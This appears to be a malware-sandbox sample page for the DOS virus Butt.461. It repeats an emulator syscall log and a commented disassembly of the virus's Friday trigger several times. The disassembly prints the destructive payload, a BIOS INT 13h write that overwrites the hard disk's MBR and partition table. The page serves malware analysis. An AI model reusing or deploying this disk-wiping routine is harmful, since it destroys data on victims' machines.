Sample viewer

vx.netlux.org/Virus.DOS.Butt.461


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:48:11.066453981Z 68 PC: 12a66 | I/O control for devices (Set for = 'Í ÀŸ')
; Emulator trace window: a linear disassembly that starts at the return address
; of the DOS "Get date" call (op 42 = INT 21h AH=2Ah; it returns the day of the
; week in AL, 0 = Sunday). It is a static decode from that PC, so not every line
; is executed and some bytes below are data decoded as instructions.
; The JSON run records on this page mark the sample DateBased and list the test
; dates 1980-01-01 (a Tuesday) and 1980-01-04 (a Friday), which fits the
; day-of-week check below.
2018-12-17T22:48:11.068143698Z 42 PC: 12acf | Get date 0x12acf: cmp al, 5  ; AL == 5 means Friday: the date trigger
0x12ad1: je 0x12ae3  ; trigger path; the target is one byte into the instruction decoded at 0x12ae2
; --- Host restore: the normal path, also reached after the payload ---
0x12ad3: pop es  ; restore segment registers; the matching pushes are outside this window
0x12ad4: pop ds
0x12ad5: mov di, 0x100  ; 0x100 = entry offset of a DOS .COM image
0x12ad8: lea si, word ptr [bp + 0xa0]  ; source of the 3 saved bytes; bp is presumably the relocation base - confirm
0x12adc: push di  ; 0x100 becomes the return address consumed by ret below
0x12add: movsw word ptr es:[di], word ptr [si]  ; copy 2 bytes ...
0x12ade: movsb byte ptr es:[di], byte ptr [si]  ; ... plus 1: three bytes rewritten at offset 0x100
0x12adf: ret  ; near return to 0x100: control passes to the restored host code
0x12ae0: int 0x20  ; not reached by fall-through (follows ret); bytes CD 20 00 are likely data, possibly the 3-byte save area - unconfirmed
0x12ae2: add byte ptr [bp + si + 0x80], bh  ; misaligned decode of 00 BA 80 00: je lands at 0x12ae3, where BA 80 00 is mov dx, 0x80 (DH=0 head 0, DL=0x80 first hard disk)
; --- Payload, Friday only: BIOS disk write ---
0x12ae6: mov cx, 1  ; CH=0 cylinder 0, CL=1 sector 1: the MBR sector
0x12ae9: mov ax, 0x380  ; AH=03h write sectors, AL=0x80 = 128 sectors requested
0x12aec: xor bx, bx
0x12aee: mov es, bx  ; buffer ES:BX = 0000:0000, i.e. low memory (interrupt vector table)
0x12af0: int 0x13  ; destructive: overwrites the MBR/partition table and following sectors of drive 0x80; the carry (error) flag is not checked
0x12af2: jmp 0x12ad3  ; back to the host restore path, so the infected program still runs afterwards
; Analyst note: an INT 13h AH=03h write to drive 0x80 at CHS 0/0/1 issued by a
; .COM program is a strong behavioural indicator of a destructive payload.
0x12af4: inc dx  ; follows an unconditional jmp; bytes 42 75 54 are ASCII "BuT", so this is probably a text string, not code
0x12af5: jne 0x12b4b

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9463,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:13.236851857Z 68 PC: 12a66 | I/O control for devices (Set for = 'Í ÀŸ')
; Emulator trace window: a linear disassembly that starts at the return address
; of the DOS "Get date" call (op 42 = INT 21h AH=2Ah; it returns the day of the
; week in AL, 0 = Sunday). It is a static decode from that PC, so not every line
; is executed and some bytes below are data decoded as instructions.
; The JSON run records on this page mark the sample DateBased and list the test
; dates 1980-01-01 (a Tuesday) and 1980-01-04 (a Friday), which fits the
; day-of-week check below.
2018-12-25T12:23:13.238763901Z 42 PC: 12acf | Get date 0x12acf: cmp al, 5  ; AL == 5 means Friday: the date trigger
0x12ad1: je 0x12ae3  ; trigger path; the target is one byte into the instruction decoded at 0x12ae2
; --- Host restore: the normal path, also reached after the payload ---
0x12ad3: pop es  ; restore segment registers; the matching pushes are outside this window
0x12ad4: pop ds
0x12ad5: mov di, 0x100  ; 0x100 = entry offset of a DOS .COM image
0x12ad8: lea si, word ptr [bp + 0xa0]  ; source of the 3 saved bytes; bp is presumably the relocation base - confirm
0x12adc: push di  ; 0x100 becomes the return address consumed by ret below
0x12add: movsw word ptr es:[di], word ptr [si]  ; copy 2 bytes ...
0x12ade: movsb byte ptr es:[di], byte ptr [si]  ; ... plus 1: three bytes rewritten at offset 0x100
0x12adf: ret  ; near return to 0x100: control passes to the restored host code
0x12ae0: int 0x20  ; not reached by fall-through (follows ret); bytes CD 20 00 are likely data, possibly the 3-byte save area - unconfirmed
0x12ae2: add byte ptr [bp + si + 0x80], bh  ; misaligned decode of 00 BA 80 00: je lands at 0x12ae3, where BA 80 00 is mov dx, 0x80 (DH=0 head 0, DL=0x80 first hard disk)
; --- Payload, Friday only: BIOS disk write ---
0x12ae6: mov cx, 1  ; CH=0 cylinder 0, CL=1 sector 1: the MBR sector
0x12ae9: mov ax, 0x380  ; AH=03h write sectors, AL=0x80 = 128 sectors requested
0x12aec: xor bx, bx
0x12aee: mov es, bx  ; buffer ES:BX = 0000:0000, i.e. low memory (interrupt vector table)
0x12af0: int 0x13  ; destructive: overwrites the MBR/partition table and following sectors of drive 0x80; the carry (error) flag is not checked
0x12af2: jmp 0x12ad3  ; back to the host restore path, so the infected program still runs afterwards
; Analyst note: an INT 13h AH=03h write to drive 0x80 at CHS 0/0/1 issued by a
; .COM program is a strong behavioural indicator of a destructive payload.
0x12af4: inc dx  ; follows an unconditional jmp; bytes 42 75 54 are ASCII "BuT", so this is probably a text string, not code
0x12af5: jne 0x12b4b

{"DateBased":true,"Day":4,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9463,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:13.354244574Z 68 PC: 12a66 | I/O control for devices (Set for = 'Í ÀŸ')
; Emulator trace window: a linear disassembly that starts at the return address
; of the DOS "Get date" call (op 42 = INT 21h AH=2Ah; it returns the day of the
; week in AL, 0 = Sunday). It is a static decode from that PC, so not every line
; is executed and some bytes below are data decoded as instructions.
; The JSON run records on this page mark the sample DateBased and list the test
; dates 1980-01-01 (a Tuesday) and 1980-01-04 (a Friday), which fits the
; day-of-week check below.
2018-12-25T12:23:13.356961545Z 42 PC: 12acf | Get date 0x12acf: cmp al, 5  ; AL == 5 means Friday: the date trigger
0x12ad1: je 0x12ae3  ; trigger path; the target is one byte into the instruction decoded at 0x12ae2
; --- Host restore: the normal path, also reached after the payload ---
0x12ad3: pop es  ; restore segment registers; the matching pushes are outside this window
0x12ad4: pop ds
0x12ad5: mov di, 0x100  ; 0x100 = entry offset of a DOS .COM image
0x12ad8: lea si, word ptr [bp + 0xa0]  ; source of the 3 saved bytes; bp is presumably the relocation base - confirm
0x12adc: push di  ; 0x100 becomes the return address consumed by ret below
0x12add: movsw word ptr es:[di], word ptr [si]  ; copy 2 bytes ...
0x12ade: movsb byte ptr es:[di], byte ptr [si]  ; ... plus 1: three bytes rewritten at offset 0x100
0x12adf: ret  ; near return to 0x100: control passes to the restored host code
0x12ae0: int 0x20  ; not reached by fall-through (follows ret); bytes CD 20 00 are likely data, possibly the 3-byte save area - unconfirmed
0x12ae2: add byte ptr [bp + si + 0x80], bh  ; misaligned decode of 00 BA 80 00: je lands at 0x12ae3, where BA 80 00 is mov dx, 0x80 (DH=0 head 0, DL=0x80 first hard disk)
; --- Payload, Friday only: BIOS disk write ---
0x12ae6: mov cx, 1  ; CH=0 cylinder 0, CL=1 sector 1: the MBR sector
0x12ae9: mov ax, 0x380  ; AH=03h write sectors, AL=0x80 = 128 sectors requested
0x12aec: xor bx, bx
0x12aee: mov es, bx  ; buffer ES:BX = 0000:0000, i.e. low memory (interrupt vector table)
0x12af0: int 0x13  ; destructive: overwrites the MBR/partition table and following sectors of drive 0x80; the carry (error) flag is not checked
0x12af2: jmp 0x12ad3  ; back to the host restore path, so the infected program still runs afterwards
; Analyst note: an INT 13h AH=03h write to drive 0x80 at CHS 0/0/1 issued by a
; .COM program is a strong behavioural indicator of a destructive payload.
0x12af4: inc dx  ; follows an unconditional jmp; bytes 42 75 54 are ASCII "BuT", so this is probably a text string, not code
0x12af5: jne 0x12b4b

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9463,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:13.37343819Z 68 PC: 12a66 | I/O control for devices (Set for = 'Í ÀŸ')
; Emulator trace window: a linear disassembly that starts at the return address
; of the DOS "Get date" call (op 42 = INT 21h AH=2Ah; it returns the day of the
; week in AL, 0 = Sunday). It is a static decode from that PC, so not every line
; is executed and some bytes below are data decoded as instructions.
; The JSON run records on this page mark the sample DateBased and list the test
; dates 1980-01-01 (a Tuesday) and 1980-01-04 (a Friday), which fits the
; day-of-week check below.
2018-12-25T12:23:13.375044771Z 42 PC: 12acf | Get date 0x12acf: cmp al, 5  ; AL == 5 means Friday: the date trigger
0x12ad1: je 0x12ae3  ; trigger path; the target is one byte into the instruction decoded at 0x12ae2
; --- Host restore: the normal path, also reached after the payload ---
0x12ad3: pop es  ; restore segment registers; the matching pushes are outside this window
0x12ad4: pop ds
0x12ad5: mov di, 0x100  ; 0x100 = entry offset of a DOS .COM image
0x12ad8: lea si, word ptr [bp + 0xa0]  ; source of the 3 saved bytes; bp is presumably the relocation base - confirm
0x12adc: push di  ; 0x100 becomes the return address consumed by ret below
0x12add: movsw word ptr es:[di], word ptr [si]  ; copy 2 bytes ...
0x12ade: movsb byte ptr es:[di], byte ptr [si]  ; ... plus 1: three bytes rewritten at offset 0x100
0x12adf: ret  ; near return to 0x100: control passes to the restored host code
0x12ae0: int 0x20  ; not reached by fall-through (follows ret); bytes CD 20 00 are likely data, possibly the 3-byte save area - unconfirmed
0x12ae2: add byte ptr [bp + si + 0x80], bh  ; misaligned decode of 00 BA 80 00: je lands at 0x12ae3, where BA 80 00 is mov dx, 0x80 (DH=0 head 0, DL=0x80 first hard disk)
; --- Payload, Friday only: BIOS disk write ---
0x12ae6: mov cx, 1  ; CH=0 cylinder 0, CL=1 sector 1: the MBR sector
0x12ae9: mov ax, 0x380  ; AH=03h write sectors, AL=0x80 = 128 sectors requested
0x12aec: xor bx, bx
0x12aee: mov es, bx  ; buffer ES:BX = 0000:0000, i.e. low memory (interrupt vector table)
0x12af0: int 0x13  ; destructive: overwrites the MBR/partition table and following sectors of drive 0x80; the carry (error) flag is not checked
0x12af2: jmp 0x12ad3  ; back to the host restore path, so the infected program still runs afterwards
; Analyst note: an INT 13h AH=03h write to drive 0x80 at CHS 0/0/1 issued by a
; .COM program is a strong behavioural indicator of a destructive payload.
0x12af4: inc dx  ; follows an unconditional jmp; bytes 42 75 54 are ASCII "BuT", so this is probably a text string, not code
0x12af5: jne 0x12b4b

{"DateBased":true,"Day":4,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9463,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:13.47044873Z 68 PC: 12a66 | I/O control for devices (Set for = 'Í ÀŸ')
; Emulator trace window: a linear disassembly that starts at the return address
; of the DOS "Get date" call (op 42 = INT 21h AH=2Ah; it returns the day of the
; week in AL, 0 = Sunday). It is a static decode from that PC, so not every line
; is executed and some bytes below are data decoded as instructions.
; The JSON run records on this page mark the sample DateBased and list the test
; dates 1980-01-01 (a Tuesday) and 1980-01-04 (a Friday), which fits the
; day-of-week check below.
2018-12-25T12:23:13.472997626Z 42 PC: 12acf | Get date 0x12acf: cmp al, 5  ; AL == 5 means Friday: the date trigger
0x12ad1: je 0x12ae3  ; trigger path; the target is one byte into the instruction decoded at 0x12ae2
; --- Host restore: the normal path, also reached after the payload ---
0x12ad3: pop es  ; restore segment registers; the matching pushes are outside this window
0x12ad4: pop ds
0x12ad5: mov di, 0x100  ; 0x100 = entry offset of a DOS .COM image
0x12ad8: lea si, word ptr [bp + 0xa0]  ; source of the 3 saved bytes; bp is presumably the relocation base - confirm
0x12adc: push di  ; 0x100 becomes the return address consumed by ret below
0x12add: movsw word ptr es:[di], word ptr [si]  ; copy 2 bytes ...
0x12ade: movsb byte ptr es:[di], byte ptr [si]  ; ... plus 1: three bytes rewritten at offset 0x100
0x12adf: ret  ; near return to 0x100: control passes to the restored host code
0x12ae0: int 0x20  ; not reached by fall-through (follows ret); bytes CD 20 00 are likely data, possibly the 3-byte save area - unconfirmed
0x12ae2: add byte ptr [bp + si + 0x80], bh  ; misaligned decode of 00 BA 80 00: je lands at 0x12ae3, where BA 80 00 is mov dx, 0x80 (DH=0 head 0, DL=0x80 first hard disk)
; --- Payload, Friday only: BIOS disk write ---
0x12ae6: mov cx, 1  ; CH=0 cylinder 0, CL=1 sector 1: the MBR sector
0x12ae9: mov ax, 0x380  ; AH=03h write sectors, AL=0x80 = 128 sectors requested
0x12aec: xor bx, bx
0x12aee: mov es, bx  ; buffer ES:BX = 0000:0000, i.e. low memory (interrupt vector table)
0x12af0: int 0x13  ; destructive: overwrites the MBR/partition table and following sectors of drive 0x80; the carry (error) flag is not checked
0x12af2: jmp 0x12ad3  ; back to the host restore path, so the infected program still runs afterwards
; Analyst note: an INT 13h AH=03h write to drive 0x80 at CHS 0/0/1 issued by a
; .COM program is a strong behavioural indicator of a destructive payload.
0x12af4: inc dx  ; follows an unconditional jmp; bytes 42 75 54 are ASCII "BuT", so this is probably a text string, not code
0x12af5: jne 0x12b4b